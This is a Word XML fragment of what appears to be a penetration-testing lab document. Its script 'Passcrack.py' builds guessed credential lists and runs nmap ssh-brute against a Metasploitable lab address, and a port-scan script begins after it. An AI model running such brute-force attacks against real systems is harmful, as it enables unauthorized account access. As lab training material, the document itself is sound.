      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DAF2C07" w14:textId="6F1991BA" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29ADAFAD" w14:textId="05EEEED1" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC95EAA" w14:textId="44870F65" w:rsidR="38758B23" w:rsidRDefault="38758B23" w:rsidP="775BB15B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Python Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B0769A" w14:textId="3DECB9B0" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58120CF5" w14:textId="3C943357" w:rsidR="4847FB3D" w:rsidRDefault="4847FB3D" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Metasploitable from Kali Linux: Brute Force </w:t>
      </w:r>
      <w:r w:rsidR="636C649C" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Attack: Passcrack.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D52D766" w14:textId="7F891300" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C31D35" w14:textId="7722AADB" w:rsidR="6566E15B" w:rsidRDefault="6566E15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>mport os</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>import subprocess</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>def userlist():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    # This function gernerates a potential list of usernames</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    f = open('username.txt', 'w')</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str('admin\n'))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str("Admin\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str("Admin1\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str("msfadmin\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str("mtt\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str('msffadmin\n'))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str("MSFadmin\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str("Administraitor\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str("msadmin\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str('mfaadmin\n'))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str("Admin123\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str("Metasplitable\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str("msfadmin\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str('Geralds\n'))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str("Admin!\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str("kali\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(str("msfadmi12n\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.close()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>def passlist():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    # This function generates a list of potential passwords</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a = open('password.txt', 'w')</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str('msfADMIN\n'))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str('Password\n'))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str("Admin\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str("P@ssword!\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str("msfadmin\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str("wordpass\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str('msffadmin\n'))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str("MSFadmin\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str("P@ss\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str("msadmin\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str('Pssword\n'))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str("Admin123\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str("P@ssword!!!!!!!\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str("msfadmin\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str('Passwordds\n'))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str("Admin!\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str("P@sswo2rd!\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.write(str("msfadmi12n\n"))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.close()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>def bruteforce():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # This function leverates the namp bruteforce scripts and adds out pass and username lists to target the host</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    cmd = ['nmap', '--script', 'ssh-brute',  '-p22', '192.168.169.132', '--script-args', 'userdb=username.txt,passdb=password.txt']</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    return subprocess.call(cmd)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>userlist()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>passlist()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>bruteforce()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="166642F0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>print (bruteforce)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B2AB01" w14:textId="63167399" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DD7C794" w14:textId="592CE8DA" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A207FDB" w14:textId="75B220D0" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36EFA3ED" w14:textId="527CDF10" w:rsidR="166642F0" w:rsidRDefault="166642F0" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scan Metasploitable from Kali Linux: Port Scan: nmapscan.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7F9428" w14:textId="7DBF9BE5" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19502212" w14:textId="36D6616C" w:rsidR="1FF18184" w:rsidRDefault="1FF18184" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>import os</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB9FF1E" w14:textId="3BD864E4" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB26EDB" w14:textId="15592A03" w:rsidR="3D27FC4A" w:rsidRDefault="3D27FC4A" w:rsidP="775BB15B">
